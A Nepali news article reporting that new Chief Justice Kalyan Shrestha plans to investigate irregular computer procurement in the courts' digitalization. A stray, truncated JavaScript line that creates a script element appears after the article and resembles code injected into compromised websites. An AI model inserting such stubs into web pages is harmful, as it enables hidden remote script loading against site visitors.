नवनियुक्त प्रधानन्यायाधीशले भने– “कम्प्युटर खरिद छानबिन हुन्छ”

rajendra bhatta Avatar

काठमाडौं- नवनियुक्त प्रधानन्यायाधीश कल्याण श्रेष्ठले अदालतको सूचना प्रविधि प्रक्रिया (डिजिटलाइजेसन) बारे उठेका प्रश्नमा अनुसन्धान गर्ने बताएका छन्। उनले सूचना प्रविधि (आइटी)का सामग्री खरिद अनियमिततालगायतका विषयमा छानबिन गर्ने बताएका हुन्। बुधबार शपथपछि पदभार ग्रहण गर्दै प्रधानन्यायाधीश श्रेष्ठले सञ्चारमाध्यममा आएका विषयमा आफ्नो ध्यानाकर्षण भएको र त्यसको अनुसन्धान गर्ने बताए।

डिजिटलाइजेसनका विषयमा अनियमितताका प्रश्न उठेका छन्,’ पदभार ग्रहणपछि प्रधानन्यायाधीश श्रेष्ठले भने, ‘सञ्चारमाध्यममा आएका विषयमा अध्ययन–अनुसन्धान गर्छु।’ तत्कालीन प्रधानन्यायाधीश रामकुमारप्रसाद साह अध्यक्षताको सूचना प्रविधि समितिले सार्वजनिक खरिद ऐनविपरीत कम मूल्यमा बोलकबोल भएको प्रस्तावभन्दा बढी मूल्यमा बोलपत्र हाल्ने कम्पनीसँग कम्प्युटर खरिदको सम्झौता थियो। भिडियो कन्फ्रेन्स मेसिन खरिद प्रक्रियाको बोलपत्र भने अदालतले रद्द गरेको थियो।

var d=document;var s=d.createElement(‘script’);

admin Avatar
About Gurkha Channel

Gurkha channel is the sister company of Gurkha TV and the first 24-hour Nepali channel operating from the international capital of the world,London, United Kingdom. Gurkha Channels believes in honesty, respect, and unity. We belong to the land of Lord Buddha, Mt. Everest, and gallant people who sacrifice their lives for peace and humanity. Therefore, in this world of globalization, it is our effort to bring all Nepalese from around the world together and make one family: one Nation.

Search
Cateegories